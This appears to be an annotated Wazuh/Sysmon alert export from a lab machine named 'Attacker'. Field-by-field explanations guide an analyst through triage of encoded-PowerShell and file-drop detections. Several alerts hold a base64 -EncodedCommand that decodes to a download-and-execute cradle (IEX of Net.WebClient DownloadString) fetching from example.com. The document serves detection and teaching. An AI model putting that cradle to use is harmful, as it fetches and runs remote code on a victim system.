No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:31.218 ProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} ProcessId: 2732 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb0-680a-990a-000000000e00} ParentProcessId: 14564 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:31.218
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb3-680a-9b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  2732
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb0-680a-990a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14564
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.121+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.121+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  13
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.883639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:34.8231642Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282011
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:33.635 ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} ProcessId: 6588 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb3-680a-9b0a-000000000e00} ParentProcessId: 2732 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:33.635
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb5-680a-9e0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6588
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb3-680a-9b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2732
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.138+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.138+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  17
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.891701
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:35.0179313Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282012
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:34.965 ProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} ProcessId: 6588 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4kimfx2r.qot.ps1 CreationUtcTime: 2025-04-24 22:35:34.965 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:34.965
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb5-680a-9e0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6588
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4kimfx2r.qot.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:34.965
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:51.760+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:51.760+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  14
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534211.894465
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:37.4234296Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282035
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:36.031 ProcessGuid: {94294ddc-bcb8-680a-a00a-000000000e00} ProcessId: 13524 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcb5-680a-9e0a-000000000e00} ParentProcessId: 6588 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:36.031
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcb8-680a-a00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13524
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcb5-680a-9e0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  6588
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

